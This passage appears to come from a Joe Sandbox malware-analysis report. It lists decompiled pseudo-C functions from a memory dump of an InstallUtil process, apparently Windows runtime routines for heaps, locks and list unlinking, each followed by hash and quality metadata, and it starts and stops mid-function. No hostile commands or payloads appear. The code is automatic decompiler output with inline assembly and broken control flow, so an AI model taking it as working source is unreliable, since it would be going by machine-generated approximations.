                      						if(_t35 == 0) {
                      							L11:
                      							_t37 = 0xc000000d;
                      							goto L7;
                      						}
                      						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                      							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                      							_t35 = _v8;
                      						}
                      						 *((intOrPtr*)(_t40 + 4)) = _t35;
                      						goto L7;
                      					}
                      					if(_t29 == 0) {
                      						goto L11;
                      					}
                      					_t32 =  *_t40;
                      					if(_t32 != 0) {
                      						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                      						E012D76E2( *_t40);
                      					}
                      					 *_t40 = _t29;
                      					goto L7;
                      				}
                      				_t40 = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                      				if(_t40 == 0) {
                      					_t37 = 0xc0000017;
                      					goto L7;
                      				}
                      				_t35 = _v8;
                      				 *_t40 = 0;
                      				 *((intOrPtr*)(_t40 + 4)) = 0;
                      				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                      				goto L3;
                      			}











                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                      • Instruction ID: 2d107c7fea3a3bb095422b56f0e965005aabb6976b58e9669497ee916875d17d
                      • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                      • Instruction Fuzzy Hash: A1217972A60A41DFD735CF0EC640A66F7E5EB94A10F25817EEA5987A51E730EC00CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 54%
                      			E012FB390(void* __ecx, intOrPtr _a4) {
                      				signed int _v8;
                      				signed char _t12;
                      				signed int _t16;
                      				signed int _t21;
                      				void* _t28;
                      				signed int _t30;
                      				signed int _t36;
                      				signed int _t41;
                      
                      				_push(__ecx);
                      				_t41 = _a4 + 0xffffffb8;
                      				E012E2280(_t12, 0x13b8608);
                      				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                      				asm("sbb edi, edi");
                      				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                      				_v8 = _t36;
                      				asm("lock cmpxchg [ebx], ecx");
                      				_t30 = 1;
                      				if(1 != 1) {
                      					while(1) {
                      						_t21 = _t30 & 0x00000006;
                      						_t16 = _t30;
                      						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                      						asm("lock cmpxchg [edi], esi");
                      						if(_t16 == _t30) {
                      							break;
                      						}
                      						_t30 = _t16;
                      					}
                      					_t36 = _v8;
                      					if(_t21 == 2) {
                      						_t16 = E013000C2(0x13b8608, 0, _t28);
                      					}
                      				}
                      				if(_t36 != 0) {
                      					_t16 = L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                      				}
                      				return _t16;
                      			}












                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2592307cfb15459525be716afea3020cbc64c5768dc3064454d8dc79f948a1ea
                      • Instruction ID: 4df0845b746e33f12653e8de50383dcf2af69c2b8935c66115c0576b3b8c8f1c
                      • Opcode Fuzzy Hash: 2592307cfb15459525be716afea3020cbc64c5768dc3064454d8dc79f948a1ea
                      • Instruction Fuzzy Hash: 951148373611109BCB19CB19CD81A6BB29AEBC5334F24013DEF16C7790DA719C02C794
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E012C9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                      				intOrPtr _t33;
                      				intOrPtr _t37;
                      				intOrPtr _t41;
                      				intOrPtr* _t46;
                      				void* _t48;
                      				intOrPtr _t50;
                      				intOrPtr* _t60;
                      				void* _t61;
                      				intOrPtr _t62;
                      				intOrPtr _t65;
                      				void* _t66;
                      				void* _t68;
                      
                      				_push(0xc);
                      				_push(0x139f708);
                      				E0131D08C(__ebx, __edi, __esi);
                      				_t65 = __ecx;
                      				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                      				if( *(__ecx + 0x24) != 0) {
                      					_push( *(__ecx + 0x24));
                      					E013095D0();
                      					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                      				}
                      				L6();
                      				L6();
                      				_push( *((intOrPtr*)(_t65 + 0x28)));
                      				E013095D0();
                      				_t33 =  *0x13b84c4; // 0x0
                      				L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                      				_t37 =  *0x13b84c4; // 0x0
                      				L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                      				_t41 =  *0x13b84c4; // 0x0
                      				E012E2280(L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x13b86b4);
                      				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                      				_t46 = _t65 + 0xe8;
                      				_t62 =  *_t46;
                      				_t60 =  *((intOrPtr*)(_t46 + 4));
                      				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                      					_t61 = 3;
                      					asm("int 0x29");
                      					_push(_t65);
                      					_t66 = _t61;
                      					_t23 = _t66 + 0x14; // 0x8df8084c
                      					_push( *_t23);
                      					E013095D0();
                      					_t24 = _t66 + 0x10; // 0x89e04d8b
                      					_push( *_t24);
                      					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                      					_t48 = E013095D0();
                      					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                      					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                      					return _t48;
                      				} else {
                      					 *_t60 = _t62;
                      					 *((intOrPtr*)(_t62 + 4)) = _t60;
                      					 *(_t68 - 4) = 0xfffffffe;
                      					E012C9325();
                      					_t50 =  *0x13b84c4; // 0x0
                      					return E0131D0D1(L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                      				}
                      			}
















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 39c333d3fc1c38a32b4b2afeb530f84e4bfc374aa5069b0f058b702ad4c76386
                      • Instruction ID: 9ceb267f86d8926aa117d811b42a909ff167baa9aeb8de6f945f338276c6eb2f
                      • Opcode Fuzzy Hash: 39c333d3fc1c38a32b4b2afeb530f84e4bfc374aa5069b0f058b702ad4c76386
                      • Instruction Fuzzy Hash: 57216D31051A02DFC726EF68CA44F29B7F9FF18708F0446ACE249976A2D734E941CB44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      			E01354257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                      				intOrPtr* _t18;
                      				intOrPtr _t24;
                      				intOrPtr* _t27;
                      				intOrPtr* _t30;
                      				intOrPtr* _t31;
                      				intOrPtr _t33;
                      				intOrPtr* _t34;
                      				intOrPtr* _t35;
                      				void* _t37;
                      				void* _t38;
                      				void* _t39;
                      				void* _t43;
                      
                      				_t39 = __eflags;
                      				_t35 = __edi;
                      				_push(8);
                      				_push(0x13a08d0);
                      				E0131D08C(__ebx, __edi, __esi);
                      				_t37 = __ecx;
                      				E013541E8(__ebx, __edi, __ecx, _t39);
                      				E012DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                      				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                      				_t18 = _t37 + 8;
                      				_t33 =  *_t18;
                      				_t27 =  *((intOrPtr*)(_t18 + 4));
                      				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                      					L8:
                      					_push(3);
                      					asm("int 0x29");
                      				} else {
                      					 *_t27 = _t33;
                      					 *((intOrPtr*)(_t33 + 4)) = _t27;
                      					_t35 = 0x13b87e4;
                      					_t18 =  *0x13b87e0; // 0x0
                      					while(_t18 != 0) {
                      						_t43 = _t18 -  *0x13b5cd0; // 0xffffffff
                      						if(_t43 >= 0) {
                      							_t31 =  *0x13b87e4; // 0x0
                      							_t18 =  *_t31;
                      							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                      								goto L8;
                      							} else {
                      								 *0x13b87e4 = _t18;
                      								 *((intOrPtr*)(_t18 + 4)) = _t35;
                      								L012C7055(_t31 + 0xfffffff8);
                      								_t24 =  *0x13b87e0; // 0x0
                      								_t18 = _t24 - 1;
                      								 *0x13b87e0 = _t18;
                      								continue;
                      							}
                      						}
                      						goto L9;
                      					}
                      				}
                      				L9:
                      				__eflags =  *0x13b5cd0;
                      				if( *0x13b5cd0 <= 0) {
                      					L012C7055(_t37);
                      				} else {
                      					_t30 = _t37 + 8;
                      					_t34 =  *0x13b87e8; // 0x0
                      					__eflags =  *_t34 - _t35;
                      					if( *_t34 != _t35) {
                      						goto L8;
                      					} else {
                      						 *_t30 = _t35;
                      						 *((intOrPtr*)(_t30 + 4)) = _t34;
                      						 *_t34 = _t30;
                      						 *0x13b87e8 = _t30;
                      						 *0x13b87e0 = _t18 + 1;
                      					}
                      				}
                      				 *(_t38 - 4) = 0xfffffffe;
                      				return E0131D0D1(L01354320());
                      			}
















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e90b01452c35263a56d80b59058acd161642d887552256799ef8dfcfada70d5b
                      • Instruction ID: 0cf876c44cca180158f196df3ff9e0d4d56b227f4734f532c8756a6090233c19
                      • Opcode Fuzzy Hash: e90b01452c35263a56d80b59058acd161642d887552256799ef8dfcfada70d5b
                      • Instruction Fuzzy Hash: 69215B70500605CFC7A9DF68D080A147BBDFF4575DF2182AEC6198B299FB319492CB40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 29%
                      			E012F2397(intOrPtr _a4) {
                      				void* __ebx;
                      				void* __ecx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				signed int _t11;
                      				void* _t19;
                      				void* _t25;
                      				void* _t26;
                      				intOrPtr _t27;
                      				void* _t28;
                      				void* _t29;
                      
                      				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                      				if( *0x13b848c != 0) {
                      					L012EFAD0(0x13b8610);
                      					if( *0x13b848c == 0) {
                      						E012EFA00(0x13b8610, _t19, _t27, 0x13b8610);
                      						goto L1;
                      					} else {
                      						_push(0);
                      						_push(_a4);
                      						_t26 = 4;
                      						_t29 = E012F2581(0x13b8610, 0x12a50a0, _t26, _t27, _t28);
                      						E012EFA00(0x13b8610, 0x12a50a0, _t27, 0x13b8610);
                      					}
                      				} else {
                      					L1:
                      					_t11 =  *0x13b8614; // 0x0
                      					if(_t11 == 0) {
                      						_t11 = E01304886(0x12a1088, 1, 0x13b8614);
                      					}
                      					_push(0);
                      					_push(_a4);
                      					_t25 = 4;
                      					_t29 = E012F2581(0x13b8610, (_t11 << 4) + 0x12a5070, _t25, _t27, _t28);
                      				}
                      				if(_t29 != 0) {
                      					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                      					 *((char*)(_t29 + 0x40)) = 0;
                      				}
                      				return _t29;
                      			}
















                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0fef41c9db5aa9d110da71e645af9eec2196d9dabb3c6f1c7bffda460aa95d05
                      • Instruction ID: a56e6c086561369782b7afd6efd78ce269a06f44f903e60d6b9595bd4eee3f2e
                      • Opcode Fuzzy Hash: 0fef41c9db5aa9d110da71e645af9eec2196d9dabb3c6f1c7bffda460aa95d05
                      • Instruction Fuzzy Hash: 8D110472760301A7E730A629AC84B26F6DDEBA5720F54447EF702AB290DAB4E8458754
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E013446A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                      				signed short* _v8;
                      				unsigned int _v12;
                      				intOrPtr _v16;
                      				signed int _t22;
                      				signed char _t23;
                      				short _t32;
                      				void* _t38;
                      				char* _t40;
                      
                      				_v12 = __edx;
                      				_t29 = 0;
                      				_v8 = __ecx;
                      				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                      				_t38 = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                      				if(_t38 != 0) {
                      					_t40 = _a4;
                      					 *_t40 = 1;
                      					E0130F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                      					_t22 = _v12 >> 1;
                      					_t32 = 0x2e;
                      					 *((short*)(_t38 + _t22 * 2)) = _t32;
                      					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                      					_t23 = E012FD268(_t38, 1);
                      					asm("sbb al, al");
                      					 *_t40 =  ~_t23 + 1;
                      					L012E77F0(_v16, 0, _t38);
                      				} else {
                      					 *_a4 = 0;
                      					_t29 = 0xc0000017;
                      				}
                      				return _t29;
                      			}












                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                      • Instruction ID: f670deea51a0c8e221a648d30b316cc404b13ad9797892de740bf8e8eaebcee5
                      • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                      • Instruction Fuzzy Hash: BA110272504208BBCB059F5C98809BEBBF9EF95314F1080AAF944C7351DA319D51C7A4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 87%
                      			E013037F5(void* __ecx, intOrPtr* __edx) {
                      				void* __ebx;
                      				void* __edi;
                      				signed char _t6;
                      				intOrPtr _t13;
                      				intOrPtr* _t20;
                      				intOrPtr* _t27;
                      				void* _t28;
                      				intOrPtr* _t29;
                      
                      				_t27 = __edx;
                      				_t28 = __ecx;
                      				if(__edx == 0) {
                      					E012E2280(_t6, 0x13b8550);
                      				}
                      				_t29 = E0130387E(_t28);
                      				if(_t29 == 0) {
                      					L6:
                      					if(_t27 == 0) {
                      						E012DFFB0(0x13b8550, _t27, 0x13b8550);
                      					}
                      					if(_t29 == 0) {
                      						return 0xc0000225;
                      					} else {
                      						if(_t27 != 0) {
                      							goto L14;
                      						}
                      						L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                      						goto L11;
                      					}
                      				} else {
                      					_t13 =  *_t29;
                      					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                      						L13:
                      						_push(3);
                      						asm("int 0x29");
                      						L14:
                      						 *_t27 = _t29;
                      						L11:
                      						return 0;
                      					}
                      					_t20 =  *((intOrPtr*)(_t29 + 4));
                      					if( *_t20 != _t29) {
                      						goto L13;
                      					}
                      					 *_t20 = _t13;
                      					 *((intOrPtr*)(_t13 + 4)) = _t20;
                      					asm("btr eax, ecx");
                      					goto L6;
                      				}
                      			}












                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 97cdc4be945b7c1ca32c80d4ec8bfe63172322c18968d78c55efa8b8ec7c3ada
                      • Instruction ID: 964543a1f33afdd48db49337468848aa1eea1bddfcabb9ffb267155af2d99aa1
                      • Opcode Fuzzy Hash: 97cdc4be945b7c1ca32c80d4ec8bfe63172322c18968d78c55efa8b8ec7c3ada
                      • Instruction Fuzzy Hash: 89012672A416219FC33B8B1ED960E27BFEAFF81B5471540E9E9058B681D730CA05C7C0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E012F002D() {
                      				void* _t11;
                      				char* _t14;
                      				signed char* _t16;
                      				char* _t27;
                      				signed char* _t29;
                      
                      				_t11 = E012E7D50();
                      				_t27 = 0x7ffe0384;
                      				if(_t11 != 0) {
                      					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                      				} else {
                      					_t14 = 0x7ffe0384;
                      				}
                      				_t29 = 0x7ffe0385;
                      				if( *_t14 != 0) {
                      					if(E012E7D50() == 0) {
                      						_t16 = 0x7ffe0385;
                      					} else {
                      						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                      					}
                      					if(( *_t16 & 0x00000040) != 0) {
                      						goto L18;
                      					} else {
                      						goto L3;
                      					}
                      				} else {
                      					L3:
                      					if(E012E7D50() != 0) {
                      						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                      					}
                      					if( *_t27 != 0) {
                      						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                      							goto L5;
                      						}
                      						if(E012E7D50() != 0) {
                      							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                      						}
                      						if(( *_t29 & 0x00000020) == 0) {
                      							goto L5;
                      						}
                      						L18:
                      						return 1;
                      					} else {
                      						L5:
                      						return 0;
                      					}
                      				}
                      			}









                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                      • Instruction ID: 5a9b6f193c6cc3477663e1ee3bc7123f0d458b63bc69798bdb04f328408e3dd5
                      • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                      • Instruction Fuzzy Hash: 51110432221686CFE727876CD948B35BBD5EF80758F0900F8EE44877A3E369D841C668
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E012D766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                      				char _v8;
                      				void* _t22;
                      				void* _t24;
                      				intOrPtr _t29;
                      				intOrPtr* _t30;
                      				void* _t42;
                      				intOrPtr _t47;
                      
                      				_push(__ecx);
                      				_t36 =  &_v8;
                      				if(E012FF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                      					L10:
                      					_t22 = 0;
                      				} else {
                      					_t24 = _v8 + __ecx;
                      					_t42 = _t24;
                      					if(_t24 < __ecx) {
                      						goto L10;
                      					} else {
                      						if(E012FF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                      							goto L10;
                      						} else {
                      							_t29 = _v8 + _t42;
                      							if(_t29 < _t42) {
                      								goto L10;
                      							} else {
                      								_t47 = _t29;
                      								_t30 = _a16;
                      								if(_t30 != 0) {
                      									 *_t30 = _t47;
                      								}
                      								if(_t47 == 0) {
                      									goto L10;
                      								} else {
                      									_t22 = L012E4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                      								}
                      							}
                      						}
                      					}
                      				}
                      				return _t22;
                      			}











                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                      • Instruction ID: 87c6eab52e15002c337b249fbbe4ef13695aaa352060a9b757cc16125184c96c
                      • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                      • Instruction Fuzzy Hash: B0018833720119AFD7209E5FCD45E6B7BADEB94A64F140538BE09CB250EA34DD0187E0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 69%
                      			E012C9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                      				intOrPtr* _t51;
                      				intOrPtr _t59;
                      				signed int _t64;
                      				signed int _t67;
                      				signed int* _t71;
                      				signed int _t74;
                      				signed int _t77;
                      				signed int _t82;
                      				intOrPtr* _t84;
                      				void* _t85;
                      				intOrPtr* _t87;
                      				void* _t94;
                      				signed int _t95;
                      				intOrPtr* _t97;
                      				signed int _t99;
                      				signed int _t102;
                      				void* _t104;
                      
                      				_push(__ebx);
                      				_push(__esi);
                      				_push(__edi);
                      				_t97 = __ecx;
                      				_t102 =  *(__ecx + 0x14);
                      				if((_t102 & 0x02ffffff) == 0x2000000) {
                      					_t102 = _t102 | 0x000007d0;
                      				}
                      				_t48 =  *[fs:0x30];
                      				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                      					_t102 = _t102 & 0xff000000;
                      				}
                      				_t80 = 0x13b85ec;
                      				E012E2280(_t48, 0x13b85ec);
                      				_t51 =  *_t97 + 8;
                      				if( *_t51 != 0) {
                      					L6:
                      					return E012DFFB0(_t80, _t97, _t80);
                      				} else {
                      					 *(_t97 + 0x14) = _t102;
                      					_t84 =  *0x13b538c; // 0x77576828
                      					if( *_t84 != 0x13b5388) {
                      						_t85 = 3;
                      						asm("int 0x29");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						_push(0x2c);
                      						_push(0x139f6e8);
                      						E0131D0E8(0x13b85ec, _t97, _t102);
                      						 *((char*)(_t104 - 0x1d)) = 0;
                      						_t99 =  *(_t104 + 8);
                      						__eflags = _t99;
                      						if(_t99 == 0) {
                      							L13:
                      							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                      							if(__eflags == 0) {
                      								E013988F5(_t80, _t85, 0x13b5388, _t99, _t102, __eflags);
                      							}
                      						} else {
                      							__eflags = _t99 -  *0x13b86c0; // 0xe607b0
                      							if(__eflags == 0) {
                      								goto L13;
                      							} else {
                      								__eflags = _t99 -  *0x13b86b8; // 0x0
                      								if(__eflags == 0) {
                      									goto L13;
                      								} else {
                      									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                      									__eflags =  *((char*)(_t59 + 0x28));
                      									if( *((char*)(_t59 + 0x28)) == 0) {
                      										E012E2280(_t99 + 0xe0, _t99 + 0xe0);
                      										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                      										__eflags =  *((char*)(_t99 + 0xe5));
                      										if(__eflags != 0) {
                      											E013988F5(0x13b85ec, _t85, 0x13b5388, _t99, _t102, __eflags);
                      										} else {
                      											__eflags =  *((char*)(_t99 + 0xe4));
                      											if( *((char*)(_t99 + 0xe4)) == 0) {
                      												 *((char*)(_t99 + 0xe4)) = 1;
                      												_push(_t99);
                      												_push( *((intOrPtr*)(_t99 + 0x24)));
                      												E0130AFD0();
                      											}
                      											while(1) {
                      												_t71 = _t99 + 8;
                      												 *(_t104 - 0x2c) = _t71;
                      												_t80 =  *_t71;
                      												_t95 = _t71[1];
                      												 *(_t104 - 0x28) = _t80;
                      												 *(_t104 - 0x24) = _t95;
                      												while(1) {
                      													L19:
                      													__eflags = _t95;
                      													if(_t95 == 0) {
                      														break;
                      													}
                      													_t102 = _t80;
                      													 *(_t104 - 0x30) = _t95;
                      													 *(_t104 - 0x24) = _t95 - 1;
                      													asm("lock cmpxchg8b [edi]");
                      													_t80 = _t102;
                      													 *(_t104 - 0x28) = _t80;
                      													 *(_t104 - 0x24) = _t95;
                      													__eflags = _t80 - _t102;
                      													_t99 =  *(_t104 + 8);
                      													if(_t80 != _t102) {
                      														continue;
                      													} else {
                      														__eflags = _t95 -  *(_t104 - 0x30);
                      														if(_t95 !=  *(_t104 - 0x30)) {
                      															continue;
                      														} else {
                      															__eflags = _t95;
                      															if(_t95 != 0) {
                      																_t74 = 0;
                      																 *(_t104 - 0x34) = 0;
                      																_t102 = 0;
                      																__eflags = 0;
                      																while(1) {
                      																	 *(_t104 - 0x3c) = _t102;
                      																	__eflags = _t102 - 3;
                      																	if(_t102 >= 3) {
                      																		break;
                      																	}
                      																	__eflags = _t74;
                      																	if(_t74 != 0) {
                      																		L49:
                      																		_t102 =  *_t74;
                      																		__eflags = _t102;
                      																		if(_t102 != 0) {
                      																			_t102 =  *(_t102 + 4);
                      																			__eflags = _t102;
                      																			if(_t102 != 0) {
                      																				 *0x13bb1e0(_t74, _t99);
                      																				 *_t102();
                      																			}
                      																		}
                      																		do {
                      																			_t71 = _t99 + 8;
                      																			 *(_t104 - 0x2c) = _t71;
                      																			_t80 =  *_t71;
                      																			_t95 = _t71[1];
                      																			 *(_t104 - 0x28) = _t80;
                      																			 *(_t104 - 0x24) = _t95;
                      																			goto L19;
                      																		} while (_t74 == 0);
                      																		goto L49;
                      																	} else {
                      																		_t82 = 0;
                      																		__eflags = 0;
                      																		while(1) {
                      																			 *(_t104 - 0x38) = _t82;
                      																			__eflags = _t82 -  *0x13b84c0;
                      																			if(_t82 >=  *0x13b84c0) {
                      																				break;
                      																			}
                      																			__eflags = _t74;
                      																			if(_t74 == 0) {
                      																				_t77 = E01399063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                      																				__eflags = _t77;
                      																				if(_t77 == 0) {
                      																					_t74 = 0;
                      																					__eflags = 0;
                      																				} else {
                      																					_t74 = _t77 + 0xfffffff4;
                      																				}
                      																				 *(_t104 - 0x34) = _t74;
                      																				_t82 = _t82 + 1;
                      																				continue;
                      																			}
                      																			break;
                      																		}
                      																		_t102 = _t102 + 1;
                      																		continue;
                      																	}
                      																	goto L20;
                      																}
                      																__eflags = _t74;
                      															}
                      														}
                      													}
                      													break;
                      												}
                      												L20:
                      												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
